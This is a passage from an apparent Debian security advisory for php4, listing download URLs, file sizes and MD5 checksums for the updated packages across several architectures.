http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 9240 43cfb68caab38fba5a281d09b9f89825\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 4956 c3e60104b44c90c95150abcd87daabfe\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 11018 d811d207c2df3412338f78791064d5a3\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 19108 8d65b7b13897bf3c43adaae0236e1ad2\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_amd64.deb\n Size/MD5 checksum: 14480 02359f755a176f54e63e623a0550cc00\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 1578436 8be1c53f96adf231edd977b4447800f8\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 1579900 bcf88d557937009a4d290d84b0c02140\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 3156546 d7c0147d4bfec6d403dee30d65d47272\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 1587496 aea909b095e8e2e2c8dd22c28b3beba2\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 206806 770c81a2a01a0d62e0c7a2649dd967bc\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 15292 89096fc458c66cc42ed39e8c590aebb6\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 201434 bfcf4df1d97187a394bdb348ab414186\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 34580 963bd27e8401b997f5db132096c53efe\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 29414 d9ec67370e1ff1a34ee461a910ed922d\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 32698 ccf0db16652cccfc3050e9a6fe14b167\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 16884 fc87ac6f38a85dce2947f6837fa7a074\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 14066 ac2ba11f0a5c9bafb07fc33f4662c896\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 12816 1819494e5b71af72939a2803cece261f\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 4854 454dd9a461d1578df29eef9d9e79264f\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 18280 472b9c619c2a2b790fe377702bb85209\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 24456 5ccb5aa3d19eff103d47a4e72d4c710d\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 33706 d4d9477166fd13f29152d84c10ace60e\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 8806 dc68c9d0d33e965d6de87adefc6427a6\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 4634 8a49172e1420f21a52b706c300ca3fbe\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 10108 912957bb863dd0cf5539104bb8fbe9fd\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 17784 363ed82e7c5a282e61eccb10386978b3\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_arm.deb\n Size/MD5 checksum: 12890 b05dad576bb78631ff62dad0c2396b22\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 1742034 4aa7a8da3bd4d55286e277c51105f6b7\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 1743650 eec83d38a33f1d00fce24981f6169b69\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 3402924 2770a323eb5a9ae9d26e7b40e2375847\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 1711704 b0659b5b7ff63c375599839092676453\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 206800 5bd9d16cb0ea9167adc6d4f4f4e6bc14\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 18140 36d67f08b6248ddf198c13fa8183361e\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 201236 ee774979bfa7f6c9e460d185fc603f9f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 40558 01a0b50fcb4c7db3ded5c92af764ba04\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 34892 0afaf5cc0bb7c070ec8eeed16b8cc25c\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 38294 cf98f4c7ade1c70393d781ebb6f0a20d\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 20224 a109e023e43f07201304b37d251f0281\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 16198 5c4542a81fc480eabb4d3e7a428f801f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 15670 803bbd2d04717f21b800e96ed2f6cbfc\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 5800 035d122608b8ff09c4e23caf178b7bb1\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 21254 5a7ee224ef7464226529bb4c18e1ee66\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 27416 1fb227429b72a24f964b8a4a0e245b59\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 39398 3d324f5eba4ed05c827a214fe97e2796\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 9642 46a60d00e5c99b798cf5959c5d5f413a\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 5452 5827a4cba786a44b9c17017e27d40104\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 11552 e55d773015b05ad10bef042c9b01cd2d\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 20638 db53e4717d976eac77ead870a2600aea\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_hppa.deb\n Size/MD5 checksum: 15654 f1036cbd0ba4d99eedefd5da81de55e4\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 1595812 6e21553e33145ee5d1d69f3aa3f35100\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 1597396 09e1a5d13c576bd2f1c94b9bba3c8ee5\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 3176204 69274148af28f2eaf9ae16c4ac9fe2b2\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 1597172 427378ff3788cccc3eaf9939c489828a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 205800 441362a231c107f9b308596e7bd0cfa2\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 15922 47c78e2004f72aec970fd8044442ef56\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 201084 f76b22456eae6313746fd5b92dd7b5f0\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 35040 9f111fde273a20af4c33ffca31382e40\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 29636 ca1f4e1b2fa072ceb234aead02966d75\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 33232 1840c4077f0dc3cad631ccb2aba84c8e\n http://security.debian.org/pool/updates/main/p/php4/php4-interbase_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 23148 3f48767500633fc685dcba0604182396\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 17054 55b2d438855005d6ae5e5f2dc00010a6\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 14058 a8482f10c18ff1bdfe2437c21d6d2541\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 13156 3b65012fd1d15c221efa83acd953119c\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 5042 a4264877af04a16cd40b3b9ee65b2839\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 18544 70007cce50b81b27401b089f7521189f\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 24548 2b0fdbd9db6fff7069843df73bf01c0e\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 33834 b3c545c38167482d44a3de35c9818ded\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 8434 d7b24c17cfe01d0a6443c10efeaf071f\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 4758 6c923f03f06899474d15e35662c14bf0\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 10262 b522a8512b55bacedca58c7094a62106\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 18058 debb997ca629c2f467d74dbb41560950\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_i386.deb\n Size/MD5 checksum: 13194 6939c627e257352c604cfbde6288c8d8\n\n Intel IA-64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 2006084 4fe7767e58b2bcb86366b433b27060af\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 2007382 fa84a36493913077ca0abfd669a1bf30\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 4009560 3829523fddc03a9cc38d4a49af85bc7f\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 2009666 a4709ff6cdd384735dace63255af7b6d\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 206790 bb99e11ba723fa171294e98eb50221a5\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 20732 ead589594478596de90cc02096ce8db1\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 201154 db93d065ab95af42d2fc0cf6f93b454d\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 53272 41b0f5e8da8c765300ae2c90e7583700\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 44072 8777316523ac768aef232ab5eb997ad1\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 45450 0bb3a57ce3424db4aef1bd1fbc06e721\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 24168 0e2e3c4149d9789439bb1931b3df8169\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 19668 9510dda6de98fd17250b5001fa72d36f\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 17870 ddd7238913367c0a2699b5c16291227b\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 6478 e47b4a79d7166e2d80c2398950ea7419\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 26540 378961d69f2416998659588a3a9daf34\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 35076 8f8ac6770e3d712740e003b71cc9d5d0\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 51244 d2d5152b1005383f5cb05c6cec858c7f\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 11240 4712ab5d4771794dc2bccc9188583604\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 6184 d5a9f98946475db9beff082ddb654622\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 13804 338d390779b1bdb8d3c264ba8466b4e0\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 26658 6f71f97b96f875981b1c8395f8cd4a0c\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_ia64.deb\n Size/MD5 checksum: 19100 7959a7be650f38882e5e441d83a2cd2e\n\n Little endian MIPS architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 1603704 9c39f8ba5e04653e3b173fab5e59319a\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 1604874 e9f3bda7f611bbe90539d7df024a085b\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 3209914 41d78b8ffd7102eac4ed8dce4e790879\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 1610624 3bd7f79fb751ef4a09d1e9b979104f0e\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 206812 82d3d83dac3f609dd96b61fc1de4d3ff\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 14632 8e03edd9091b44c06a48679378b524d1\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 201246 09743a7c1ed1e41ed9909e958c36d7a0\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 33904 728c21d25d8b02c0f19b366e09b91981\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 28862 8af5be4aeaa9ec48a3d176a1a9fcb70a\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 30220 3ce8636e04125d1dc783ed18fa1cf72d\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 17022 fb661fcedba95640f23288400a5e26c9\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 12748 cd637704a8b029cd88b11c26a61dc452\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 12324 3cca3c8198feb4f035906dfc197beb66\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 5220 bda73a77b7d5c682f5761ac675980fa2\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 18090 f6cf2232aad58559e91974949ba1c615\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 23374 224c08bfad45fa777583b2e7127d90a5\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 33330 498864e324554c8c428f1bed7061916f\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 8242 2a3629f2f039cc95a1a5ecde31c2cdc3\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 4894 f60fc043cbacd7602570d8e5d02ddd33\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 10304 e7fca3738a53c40c61510e3d7d4df234\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 18110 4db29fb071c2c7f6c72497bcc0a6c457\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_mipsel.deb\n Size/MD5 checksum: 13220 756b4afd502baa8371bfd60a8ccf1003\n\n PowerPC architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 1647880 04f6d567541a4b41168af89669ce9ea2\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 1649238 10741f49bf2b345476902eb7a7460193\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 3257448 6db3ecc833eec9c173a440f637120f8f\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 1635624 34f314845157edc92a1df0af0354df8a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 206804 3d3ab70c41b2b5dd9b38d30953d2967a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 17790 9dd3faff28d9765b80bcb9f134295cfb\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 201196 b951068b268dd045ad941ca56ba0284f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 37702 730957d5c73840762df250c8243ea214\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 32308 f0ac41c16a310c5a1f942550547feb61\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 34532 92ebccb8fa1dc24e1a786a3ee9e742fb\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 18964 9107a17dae71d36bf8cea8a4d49a6686\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 15832 dc15474d8caed3c532cd11f612e7cd36\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 15110 f72af5e2281cbc51da969a51dbf92c55\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 6730 9117a9d1a67459d8f54484c708830e23\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 20300 edef4b84fe981d0468a5bd74e5ba440f\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 26094 214eab2096381c199ee79ff9d875159d\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 36092 dc375c65c0937a846a5e67b0db1c6f66\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 10050 5ef98337dd7738ecf7b775c79dce2582\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 6346 7f598c08c5dd1c8720b3e62305d1fe26\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 11866 34f7ad964a4a1b307ece9ed5e9799181\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 19952 0328b2af4129d5389b1770727535af32\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_powerpc.deb\n Size/MD5 checksum: 15334 a512fed8e9b941fe00d38acef06d14b3\n\n IBM S/390 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 1704244 c1f4fae006076fa32b17c5879ac1c768\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 1704984 9be3fd4c41168197c5554eb80a4c1b69\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 3351810 7d2611160b682acd1cb5eefdedce4ee9\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 1683968 d37e7d7ab43cf6ff783cc4a428a33ed7\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 206790 8d462edf1d968453ff48a4d6c7980723\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 15906 02792ce865a9a817e0c65c9580effe99\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 201176 137b080df7110399e45b574fbf60b309\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 39114 1ff308b4fad36eb9363d45b9ee5ab81f\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 31620 5feb2bcca9043733db593d34c82a52a3\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 35524 c1df0917588eb35f77807fea59ad2324\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 19176 d8a39d9837ee37241b01c2a1ec02c627\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 14404 f7f65b2b88292c0f5f92cd648a34086b\n http://security.debian.org/pool/updates/main/p/php4/php4-mcrypt_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 13884 ac2239aea754da6c9d74c2267e386cca\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 5472 410101ba332de5fe27e4eb6e9bb25773\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 20730 5f3931fc8add6489882e04d7ffec57cb\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 26800 85900b459c42286f26a361b9e9e1fea2\n http://security.debian.org/pool/updates/main/p/php4/php4-pgsql_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 37600 536fcf0f854753e4e86a1d3b83efc9b9\n http://security.debian.org/pool/updates/main/p/php4/php4-pspell_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 9078 7fbcfcc49f4f2370c9aebb6366395f39\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 5108 c89a6529d8aea4e654e72a3d64c2e8ef\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 11106 b4eb376aaab642cea745050cf352bf04\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 19370 ec56065177422c1359e49858539b650d\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.4.4-8+etch4_s390.deb\n Size/MD5 checksum: 14636 38d346eed5cf0af55f84e2e9b0065a91\n\n Sun Sparc architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 1599768 a92a3cd6aa60653c7edd5df07aa3f745\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 1601386 56ddccaf1bb572ef161601852d1d7e48\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 3148956 dc207693d3b25d158dd8bdcf423aefbf\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 1583778 6a9800c86c06f22412eed447606537de\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 206812 00d9f4b7cf2d1381eb51e49185139de0\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 16072 3d0ed853ea9d5a9acdb68c2604f92e5c\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 201220 2ff0bd326b40891e0019a830c8fc14c7\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 33630 5231d67382f98a4125e352a38c1a088a\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 28798 da4593b5478069f02cd4ef836572c5a0\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 31568 aeafd62478dfbffab86f63e97518bb2e\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.4.4-8+etch4_sparc.deb\n Size/MD5 checksum: 16218 